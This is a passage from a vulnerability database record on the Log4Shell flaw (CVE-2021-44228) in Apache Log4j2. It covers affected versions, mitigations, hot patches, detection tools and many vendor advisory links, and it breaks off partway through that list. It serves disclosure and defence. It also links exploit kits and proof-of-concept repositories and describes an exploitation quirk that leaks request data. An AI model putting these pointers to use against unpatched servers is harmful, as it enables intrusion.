gsd-2021-44228
Vulnerability from gsd
Modified
2023-12-13 01:23
Details
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Aliases
Aliases
{
"GSD": {
"affected_component": "unspecified",
"alias": "CVE-2021-44228",
"attack_vector": "network",
"credit": "",
"description": "This vulnerability was not correctly fixed \"in certain non-default configuration\" and a new vulnerability and patch have been released, please see GSD-2021-1002353 (CVE-2021-45046). Apache Log4j2 \u003c=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. \n\n In log4j 2.15.1 and later JNDI will be disabled by default: \n\n \"Dealing with CVE-2021-44228 has shown the JNDI has significant security issues. While we have mitigated what we are aware of it would be safer for users to completely disable it by default, especially since the large majority are unlikely to be using it. Those who are will need to specify -Dlog4j2.enableJndi=true or the environment variable form of it to use any JNDI components.\" (https://issues.apache.org/jira/browse/LOG4J2-3208) \n\n In previous releases (\u003e2.10) this behavior can be mitigated by setting system property \"log4j2.formatMsgNoLookups\" to \"true\" or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting \"com.sun.jndi.rmi.object.trustURLCodebase\" and \"com.sun.jndi.cosnaming.object.trustURLCodebase\" to \"false\". \n\n Later versions of the Oracle Java JDK are not affected by the LDAP attack vector, but other vectors are available for exploitation: \"JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector but please note this still leaves other attack vectors. In these versions com.sun.jndi.ldap.object.trustURLCodebase is set to \"false\" meaning JNDI cannot load remote code using LDAP.\" (https://www.lunasec.io/docs/blog/log4j-zero-day/) \n\n Also please note that log4j version 1.x is not affected by this specific vulnerability it does have a number of known serious security flaws and likely also contains Remote Code Execution vulnerabilities, upgrading it should be investigated. \n\n Hot patches: \n\n There are currently several projects providing hot patches that can modify a running system to remove the vulnerability and are OpenSource licensed allowing them to be easily audited: \n\n Log4jHotPatch \n\n This is a tool which injects a Java agent into a running JVM process. The agent will attempt to patch the lookup() method of all loaded org.apache.logging.log4j.core.lookup.JndiLookup instances to unconditionally return the string \"Patched JndiLookup::lookup()\". It is designed to address the CVE-2021-44228 remote code execution vulnerability in Log4j without restarting the Java process. The dynamic and static agents are known to run on JDK 8 \u0026 11 on Linux whereas on JDK 17 only the static agent is working (see below)\" (https://github.com/corretto/hotpatch-for-apache-log4j2) \n\n Logout4Shell \n\n \"However, enabling these system property requires access to the vulnerable servers as well as a restart. The Cybereason research team has developed the following code that exploits the same vulnerability and the payload therein forces the logger to reconfigure itself with the vulnerable setting disabled - this effectively blocks any further attempt to exploit Log4Shell on this server.\" (https://github.com/Cybereason/Logout4Shell) \n\n Detection \n\n Please see the GSD reference links tagged with \"DETECTION\" for more information (there are to many to list here). \n\n TOP LINKS: \n\n Best list of vulnerable software: https://github.com/NCSC-NL/log4shell/tree/main/software\n\n Best list of vulnerable services: https://github.com/YfryTchsGD/Log4jAttackSurface \n\n Best hotpatch:\n\n https://github.com/corretto/hotpatch-for-apache-log4j2 \n\n Best detection:\n\n grep: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b\n\n jarhashes: https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes \n\n semgrep: https://github.com/returntocorp/semgrep-rules/pull/1650/commits/ecfc32623eec718d61ec83b9196574f333191008/\n\n yara: https://github.com/timb-machine/log4j/\n\n burpsuite: https://github.com/silentsignal/burp-log4shell \n\n Nmap NSE: https://github.com/Diverto/nse-log4shell\n\n Scanners: \n https://github.com/alexbakker/log4shell-tools\n https://github.com/fullhunt/log4j-scan\n https://github.com/takito1812/log4j-detect\n\nExploitation: \n\n An exploit kit is available at https://github.com/pimps/JNDI-Exploit-Kit and it has also been reported that omitting the closing } can result in data from other requests being sent as some servers with log4j2 will apparently keep sending data until they find a closing }.",
"id": "GSD-2021-44228",
"impact": "remote code execution",
"modified": "2022-09-03T22:57:05Z",
"notes": "",
"product_name": [
"Log4j",
"Log4j2"
],
"product_version": "\u003c=2.14.1",
"references": [
{
"type": "EVIDENCE",
"url": "https://www.suse.com/security/cve/CVE-2021-44228.html"
},
{
"type": "EVIDENCE",
"url": "https://www.debian.org/security/2021/dsa-5020"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2022:0296"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2022:0203"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2022:0082"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5148"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5141"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5140"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5138"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5137"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5133"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5132"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5130"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5129"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5128"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5127"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5126"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5108"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5107"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5106"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5094"
},
{
"type": "EVIDENCE",
"url": "https://access.redhat.com/errata/RHSA-2021:5093"
},
{
"type": "EVIDENCE",
"url": "https://ubuntu.com/security/CVE-2021-44228"
},
{
"type": "EVIDENCE",
"url": "https://advisories.mageia.org/CVE-2021-44228.html"
},
{
"type": "EVIDENCE",
"url": "https://security.archlinux.org/CVE-2021-44228"
},
{
"type": "EVIDENCE",
"url": "https://alas.aws.amazon.com/cve/html/CVE-2021-44228.html"
},
{
"type": "EVIDENCE",
"url": "https://packetstormsecurity.com/files/cve/CVE-2021-44228"
},
{
"name": "https://twitter.com/stereotype32/status/1469313856229228544",
"type": "EVIDENCE",
"url": "https://twitter.com/stereotype32/status/1469313856229228544"
},
{
"name": "https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/"
},
{
"name": "Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package",
"type": "EVIDENCE",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"name": "https://github.com/tangxiaofeng7/apache-log4j-poc",
"type": "EVIDENCE",
"url": "https://github.com/tangxiaofeng7/apache-log4j-poc"
},
{
"name": "https://news.ycombinator.com/item?id=29504755",
"type": "EVIDENCE",
"url": "https://news.ycombinator.com/item?id=29504755"
},
{
"name": "https://twitter.com/P0rZ9/status/1468949890571337731",
"type": "EVIDENCE",
"url": "https://twitter.com/P0rZ9/status/1468949890571337731"
},
{
"name": "https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/",
"type": "FIX",
"url": "https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/"
},
{
"name": "https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/",
"type": "EVIDENCE",
"url": "https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/"
},
{
"name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce"
},
{
"name": "http://mail-archives.us.apache.org/mod_mbox/www-announce/202112.mbox/%3C643bc702-4b46-411b-4980-1fcf637dbb11%40apache.org%3E",
"type": "EVIDENCE",
"url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/202112.mbox/%3C643bc702-4b46-411b-4980-1fcf637dbb11%40apache.org%3E"
},
{
"name": "https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.html",
"type": "EVIDENCE",
"url": "https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.html"
},
{
"content": "Further development of this tool will continue at corretto/hotpatch-for-apache-log4j2.",
"name": "https://github.com/simonis/Log4jPatch",
"type": "FIX",
"url": "https://github.com/simonis/Log4jPatch"
},
{
"content": "This is a tool which injects a Java agent into a running JVM process. The agent will attempt to patch the lookup() method of all loaded org.apache.logging.log4j.core.lookup.JndiLookup instances to unconditionally return the string \"Patched JndiLookup::lookup()\". It is designed to address the CVE-2021-44228 remote code execution vulnerability in Log4j without restarting the Java process.",
"name": "Log4jHotPatch",
"type": "FIX",
"url": "https://github.com/corretto/hotpatch-for-apache-log4j2"
},
{
"content": "We recommend that those running affected applications upgrade Log4j to version 2.15 to address this vulnerability. However, this isn\u2019t always quick, so folks from the Coretto team spent some time building a tool to hotpatch vulnerable log4j deployments. This tool is designed to hotpatch a running JVM using any Log4j 2.0+. The tool is idempotent, meaning that you can run this multiple times on the same JVM without changing the result past the initial application. This tool also looks for all the running JVMs and attempts to mitigate the vulnerability. You can also use this to patch shaded jars that include log4j as a dependency, and to patch multiple log4j instances on the classpath.",
"name": "Hotpatch for Apache Log4j",
"type": "EVIDENCE",
"url": "https://aws.amazon.com/blogs/opensource/hotpatch-for-apache-log4j/"
},
{
"name": "https://github.com/YfryTchsGD/Log4jAttackSurface",
"type": "EVIDENCE",
"url": "https://github.com/YfryTchsGD/Log4jAttackSurface"
},
{
"name": "https://twitter.com/halvarflake/status/1469318326929272835",
"type": "EVIDENCE",
"url": "https://twitter.com/halvarflake/status/1469318326929272835"
},
{
"name": "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
"type": "EVIDENCE",
"url": "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b"
},
{
"name": "https://twitter.com/_JohnHammond/status/1469255402290401285",
"type": "EVIDENCE",
"url": "https://twitter.com/_JohnHammond/status/1469255402290401285"
},
{
"name": "https://logging.apache.org/log4j/2.x/manual/lookups.html",
"type": "EVIDENCE",
"url": "https://logging.apache.org/log4j/2.x/manual/lookups.html"
},
{
"name": "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf",
"type": "EVIDENCE",
"url": "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf"
},
{
"content": "JNDI (Java Naming and Directory Interface) is a Java API that allows clients to discover and look up data and objects via a name. These objects can be stored in different naming or directory services such as RMI, CORBA, LDAP, or DNS.\n\nThis talk will present a new type of vulnerability named \"JNDI Reference Injection\" found on malware samples attacking Java Applets (CVE-2015-4902). The same principles can be applied to attack web applications running JNDI lookups on names controlled by attackers. As we will demo during the talk, attackers will be able to use different techniques to run arbitrary code on the server performing JNDI lookups.\n\nThe talk will first present the basics of this new vulnerability including the underlying technology, and will then explain in depth the different ways an attacker can exploit it using different vectors and services. We will focus on exploiting RMI, LDAP and CORBA services as these are present in almost every Enterprise application.\n\nLDAP offers an alternative attack vector where attackers not able to influence the address of an LDAP lookup operation may still be able to modify the LDAP directory in order to store objects that will execute arbitrary code upon retrieval by the application lookup operation. This may be exploited through LDAP manipulation or simply by modifying LDAP entries as some Enterprise directories allow.",
"name": "A JOURNEY FROM JNDI/LDAP MANIPULATION TO REMOTE CODE EXECUTION DREAM LAND",
"tags": [
"timeline"
],
"timestamp": "2016-08-03",
"type": "EVIDENCE",
"url": "https://www.blackhat.com/us-16/briefings/schedule/#a-journey-from-jndildap-manipulation-to-remote-code-execution-dream-land-3345"
},
{
"name": "https://twitter.com/aksquaretech/status/1469297067948347394",
"type": "EVIDENCE",
"url": "https://twitter.com/aksquaretech/status/1469297067948347394"
},
{
"name": "https://rules.emergingthreatspro.com/open/",
"type": "FIX",
"url": "https://rules.emergingthreatspro.com/open/"
},
{
"name": "RHSB-2021-009 Log4Shell - Remote Code Execution - log4j",
"type": "FIX",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"name": "https://www.suse.com/security/cve/CVE-2021-44228.html",
"type": "FIX",
"url": "https://www.suse.com/security/cve/CVE-2021-44228.html"
},
{
"name": "https://security-tracker.debian.org/tracker/CVE-2021-44228",
"type": "FIX",
"url": "https://security-tracker.debian.org/tracker/CVE-2021-44228"
},
{
"name": "https://ubuntu.com/security/CVE-2021-44228",
"type": "FIX",
"url": "https://ubuntu.com/security/CVE-2021-44228"
},
{
"name": "Log4j RCE: Emergency patch issued to plug critical auth-free code execution hole in widely-used logging utility",
"type": "EVIDENCE",
"url": "https://www.theregister.com/2021/12/10/log4j_remote_code_execution_vuln_patch_issued/"
},
{
"name": "https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce",
"type": "EVIDENCE",
"url": "https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce"
},
{
"name": "https://twitter.com/chvancooten/status/1469340927923826691",
"type": "EVIDENCE",
"url": "https://twitter.com/chvancooten/status/1469340927923826691"
},
{
"name": "VMSA-2021-0028",
"type": "FIX",
"url": "https://www.vmware.com/security/advisories/VMSA-2021-0028.html"
},
{
"name": "https://www.cnblogs.com/yyhuni/p/15088134.html",
"type": "EVIDENCE",
"url": "https://www.cnblogs.com/yyhuni/p/15088134.html"
},
{
"name": "CVE-2021-44228 \u2013 Log4j 2 Vulnerability Analysis",
"type": "EVIDENCE",
"url": "https://www.randori.com/blog/cve-2021-44228/"
},
{
"name": "CVE-2021-44228-Log4Shell-Hashes",
"type": "EVIDENCE",
"url": "https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes"
},
{
"name": "Using Anchore Enterprise to Detect and Prevent Log4Shell, the Log4j Zero-Day Vulnerability",
"type": "EVIDENCE",
"url": "https://anchore.com/blog/using-anchore-enterprise-to-detect-prevent-log4j-zero-day/"
},
{
"name": "How to detect the Log4j vulnerability in your applications",
"type": "EVIDENCE",
"url": "https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html"
},
{
"name": "https://developers.slashdot.org/story/21/12/10/2131259/new-zero-day-in-the-log4j-java-library-is-already-being-exploited",
"type": "EVIDENCE",
"url": "https://developers.slashdot.org/story/21/12/10/2131259/new-zero-day-in-the-log4j-java-library-is-already-being-exploited"
},
{
"name": "https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/",
"type": "EVIDENCE",
"url": "https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/"
},
{
"name": "https://blog.cloudflare.com/how-cloudflare-security-responded-to-log4j2-vulnerability/",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/how-cloudflare-security-responded-to-log4j2-vulnerability/"
},
{
"name": "https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/"
},
{
"name": "https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/",
"type": "EVIDENCE",
"url": "https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/"
},
{
"name": "https://www.wired.com/story/log4j-flaw-hacking-internet/",
"type": "EVIDENCE",
"url": "https://www.wired.com/story/log4j-flaw-hacking-internet/"
},
{
"name": "https://github.com/returntocorp/semgrep-rules/pull/1650/commits/ecfc32623eec718d61ec83b9196574f333191008/",
"type": "EVIDENCE",
"url": "https://github.com/returntocorp/semgrep-rules/pull/1650/commits/ecfc32623eec718d61ec83b9196574f333191008"
},
{
"name": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"name": "https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability",
"type": "EVIDENCE",
"url": "https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability"
},
{
"name": "https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability",
"type": "FIX",
"url": "https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability"
},
{
"name": "https://www.reddit.com/r/netsec/comments/re468q/log4shell_using_the_vulnerability_to_patch_the/",
"type": "FIX",
"url": "https://www.reddit.com/r/netsec/comments/re468q/log4shell_using_the_vulnerability_to_patch_the/"
},
{
"name": "Logout4Shell",
"type": "FIX",
"url": "https://github.com/Cybereason/Logout4Shell"
},
{
"name": "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/",
"type": "EVIDENCE",
"url": "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/"
},
{
"name": "https://github.com/christophetd/log4shell-vulnerable-app",
"type": "EVIDENCE",
"url": "https://github.com/christophetd/log4shell-vulnerable-app"
},
{
"name": "https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22",
"type": "EVIDENCE",
"url": "https://www.greynoise.io/viz/query/?gnql=tags%3A%22Apache%20Log4j%20RCE%20Attempt%22"
},
{
"name": "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/",
"type": "EVIDENCE",
"url": "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/log4shell-vulnerability-is-the-coal-in-our-stocking-for-2021/"
},
{
"name": "https://twitter.com/canrevagency/status/1469487239671468033",
"type": "EVIDENCE",
"url": "https://twitter.com/canrevagency/status/1469487239671468033"
},
{
"name": "https://twitter.com/sans_isc/status/1469653801581875208",
"type": "EVIDENCE",
"url": "https://twitter.com/sans_isc/status/1469653801581875208"
},
{
"name": "https://twitter.com/rayhan0x01",
"type": "EVIDENCE",
"url": "https://twitter.com/rayhan0x01"
},
{
"name": "https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592",
"type": "EVIDENCE",
"url": "https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592"
},
{
"name": "https://twitter.com/lukolejnik/status/1469327074271899652",
"type": "EVIDENCE",
"url": "https://twitter.com/lukolejnik/status/1469327074271899652"
},
{
"name": "https://twitter.com/cyb3rops/status/1469405846010572816",
"type": "EVIDENCE",
"url": "https://twitter.com/cyb3rops/status/1469405846010572816"
},
{
"name": "Akamai",
"type": "ADVISORY",
"url": "https://www.akamai.com/blog/news/CVE-2021-44228-Zero-Day-Vulnerability"
},
{
"name": "Apache Druid",
"type": "ADVISORY",
"url": "https://github.com/apache/druid/pull/12051"
},
{
"name": "Apache Flink",
"type": "ADVISORY",
"url": "https://flink.apache.org/2021/12/10/log4j-cve.html"
},
{
"name": "Apache LOG4J",
"type": "ADVISORY",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"name": "Apache Kafka",
"type": "ADVISORY",
"url": "https://lists.apache.org/thread/lgbtvvmy68p0059yoyn9qxzosdmx4jdv"
},
{
"name": "Apache Solr",
"type": "ADVISORY",
"url": "https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228"
},
{
"name": "Apero CAS",
"type": "ADVISORY",
"url": "https://apereo.github.io/2021/12/11/log4j-vuln/"
},
{
"name": "Aptible",
"type": "ADVISORY",
"url": "https://status.aptible.com/incidents/gk1rh440h36s?u=zfbcrbt2lkv4"
},
{
"name": "Atlassian",
"type": "ADVISORY",
"url": "https://confluence.atlassian.com/kb/faq-for-cve-2021-44228-1103069406.html"
},
{
"name": "Automox",
"type": "ADVISORY",
"url": "https://blog.automox.com/log4j-critical-vulnerability-scores-a-10"
},
{
"name": "AWS",
"type": "ADVISORY",
"url": "https://aws.amazon.com/security/security-bulletins/AWS-2021-005/"
},
{
"name": "AZURE Datalake store java",
"type": "ADVISORY",
"url": "https://github.com/Azure/azure-data-lake-store-java/blob/ed5d6304783286c3cfff0a1dee457a922e23ad48/CHANGES.md#version-2310"
},
{
"name": "BACKBLAZE",
"type": "ADVISORY",
"url": "https://twitter.com/backblaze/status/1469477224277368838"
},
{
"name": "BitNami By VMware",
"type": "ADVISORY",
"url": "https://docs.bitnami.com/general/security/security-2021-12-10/"
},
{
"name": "Broadcom",
"type": "ADVISORY",
"url": "https://support.broadcom.com/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793"
},
{
"name": "CarbonBlack",
"type": "ADVISORY",
"url": "https://community.carbonblack.com/t5/Threat-Research-Docs/Log4Shell-Log4j-Remote-Code-Execution-CVE-2021-44228/ta-p/109134"
},
{
"name": "Cerberus FTP",
"type": "ADVISORY",
"url": "https://support.cerberusftp.com/hc/en-us/articles/4412448183571-Cerberus-is-not-affected-by-CVE-2021-44228-log4j-0-day-vulnerability"
},
{
"name": "CheckPoint",
"type": "ADVISORY",
"url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=\u0026solutionid=sk176865\u0026partition=General\u0026product=IPS"
},
{
"name": "Cisco: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd",
"type": "ADVISORY",
"url": ""
},
{
"name": "Citrix",
"type": "ADVISORY",
"url": "https://support.citrix.com/article/CTX335705"
},
{
"name": "CloudFlare",
"type": "ADVISORY",
"url": "https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/"
},
{
"name": "CPanel",
"type": "ADVISORY",
"url": "https://forums.cpanel.net/threads/log4j-cve-2021-44228-does-it-affect-cpanel.696249/"
},
{
"name": "CommVault https://community.commvault.com/technical-q-a-2/log4j-been-used-in-commvault-1985?postid=11745#post11745",
"type": "ADVISORY",
"url": ""
},
{
"name": "Connect2id",
"type": "ADVISORY",
"url": "https://connect2id.com/blog/connect2id-server-12-5-1"
},
{
"name": "ConnectWise",
"type": "ADVISORY",
"url": "https://www.connectwise.com/company/trust/advisories"
},
{
"name": "ContrastSecurity",
"type": "ADVISORY",
"url": "https://support.contrastsecurity.com/hc/en-us/articles/4412612486548"
},
{
"name": "Coralogix",
"type": "ADVISORY",
"url": "https://twitter.com/Coralogix/status/1469713430659559425"
},
{
"name": "CouchBase",
"type": "ADVISORY",
"url": "https://forums.couchbase.com/t/ann-elasticsearch-connector-4-3-3-4-2-13-fixes-log4j-vulnerability/32402"
},
{
"name": "Cybereason",
"type": "ADVISORY",
"url": "https://www.cybereason.com/blog/cybereason-solutions-are-not-impacted-by-apache-log4j-vulnerability-cve-2021-44228"
},
{
"name": "Datto",
"type": "ADVISORY",
"url": "https://www.datto.com/blog/dattos-response-to-log4shell"
},
{
"name": "Debian",
"type": "ADVISORY",
"url": "https://security-tracker.debian.org/tracker/CVE-2021-44228"
},
{
"name": "Dell",
"type": "ADVISORY",
"url": "https://www.dell.com/support/kbdoc/fr-fr/000194372/dsn-2021-007-dell-response-to-apache-log4j-remote-code-execution-vulnerability"
},
{
"name": "Docker",
"type": "ADVISORY",
"url": "https://www.docker.com/blog/apache-log4j-2-cve-2021-44228/"
},
{
"name": "DropWizard",
"type": "ADVISORY",
"url": "https://twitter.com/dropwizardio/status/1469285337524580359"
},
{
"name": "DynaTrace",
"type": "ADVISORY",
"url": "https://community.dynatrace.com/t5/Dynatrace-Open-Q-A/Impact-of-log4j-zero-day-vulnerability/m-p/177259/highlight/true#M19282"
},
{
"name": "Eclipse Foundation",
"type": "ADVISORY",
"url": "https://git.eclipse.org/r/c/tracecompass/org.eclipse.tracecompass/+/188751"
},
{
"name": "Elastic",
"type": "ADVISORY",
"url": "https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476"
},
{
"name": "EVLLABS JGAAP",
"type": "ADVISORY",
"url": "https://github.com/evllabs/JGAAP/releases/tag/v8.0.2"
},
{
"name": "F5 Networks",
"type": "ADVISORY",
"url": "https://support.f5.com/csp/article/K19026212"
},
{
"name": "F-Secure https://status.f-secure.com/incidents/sk8vmr0h34pd",
"type": "ADVISORY",
"url": ""
},
{
"name": "Forescout",
"type": "ADVISORY",
"url": "https://forescout.force.com/support/s/article/Important-security-information-related-to-Apache-Log4j-utility-CVE-2021-44228"
},
{
"name": "FusionAuth",
"type": "ADVISORY",
"url": "https://fusionauth.io/blog/2021/12/10/log4j-fusionauth/"
},
{
"name": "Ghidra",
"type": "ADVISORY",
"url": "https://github.com/NationalSecurityAgency/ghidra/blob/2c73c72f0ba2720c6627be4005a721a5ebd64b46/README.md#warning"
},
{
"name": "GitHub",
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"name": "Atos Unify",
"type": "ADVISORY",
"url": "https://networks.unify.com/security/advisories/OBSO-2112-01"
},
{
"name": "GoAnywhere",
"type": "ADVISORY",
"url": "https://www.goanywhere.com/cve-2021-44228-goanywhere-mitigation-steps"
},
{
"name": "Google Cloud Armor WAF",
"type": "ADVISORY",
"url": "https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerability"
},
{
"name": "GrayLog",
"type": "ADVISORY",
"url": "https://www.graylog.org/post/graylog-update-for-log4j"
},
{
"name": "GuardedBox",
"type": "ADVISORY",
"url": "https://twitter.com/GuardedBox/status/1469739834117799939"
},
{
"name": "HackerOne",
"type": "ADVISORY",
"url": "https://twitter.com/jobertabma/status/1469490881854013444"
},
{
"name": "Huawei",
"type": "ADVISORY",
"url": "https://www.huawei.com/en/psirt/security-notices/huawei-sn-20211210-01-log4j2-en"
},
{
"name": "HostiFi",
"type": "ADVISORY",
"url": "https://twitter.com/hostifi_net/status/1469511114824339464"
},
{
"name": "Informatica",
"type": "ADVISORY",
"url": "https://network.informatica.com/community/informatica-network/blog/2021/12/10/log4j-vulnerability-update"
},
{
"name": "Ivanti",
"type": "ADVISORY",
"url": "https://forums.ivanti.com/s/article/CVE-2021-44228-Java-logging-library-log4j-Ivanti-Products-Impact-Mapping?language=en_US"
},
{
"name": "Imperva",
"type": "ADVISORY",
"url": "https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/"
},
{
"name": "JAMF NATION",
"type": "ADVISORY",
"url": "https://community.jamf.com/t5/jamf-pro/third-party-security-issue/td-p/253740"
},
{
"name": "JazzSM DASH IBM",
"type": "ADVISORY",
"url": "https://www.ibm.com/support/pages/node/6525552"
},
{
"name": "Jenkins",
"type": "ADVISORY",
"url": "https://www.jenkins.io/blog/2021/12/10/log4j2-rce-CVE-2021-44228/"
},
{
"name": "JFROG",
"type": "ADVISORY",
"url": "https://twitter.com/jfrog/status/1469385793823199240"
},
{
"name": "Jitsi",
"type": "ADVISORY",
"url": "https://github.com/jitsi/security-advisories/blob/4e1ab58585a8a0593efccce77d5d0e22c5338605/advisories/JSA-2021-0004.md"
},
{
"name": "Keycloak",
"type": "ADVISORY",
"url": "https://github.com/keycloak/keycloak/discussions/9078"
},
{
"name": "Kafka Connect CosmosDB",
"type": "ADVISORY",
"url": "https://github.com/microsoft/kafka-connect-cosmosdb/blob/0f5d0c9dbf2812400bb480d1ff0672dfa6bb56f0/CHANGELOG.md"
},
{
"name": "LucentSKY",
"type": "ADVISORY",
"url": "https://twitter.com/LucentSky/status/1469358706311974914"
},
{
"name": "Lightbend",
"type": "ADVISORY",
"url": "https://discuss.lightbend.com/t/regarding-the-log4j2-vulnerability-cve-2021-44228/9275"
},
{
"name": "Macchina io",
"type": "ADVISORY",
"url": "https://twitter.com/macchina_io/status/1469611606569099269"
},
{
"name": "McAfee",
"type": "ADVISORY",
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=KB95091"
},
{
"name": "Metabase",
"type": "ADVISORY",
"url": "https://github.com/metabase/metabase/commit/8bfce98beb25e48830ac2bfd57432301c5e3ab37"
},
{
"name": "Minecraft",
"type": "ADVISORY",
"url": "https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition"
},
{
"name": "N-able",
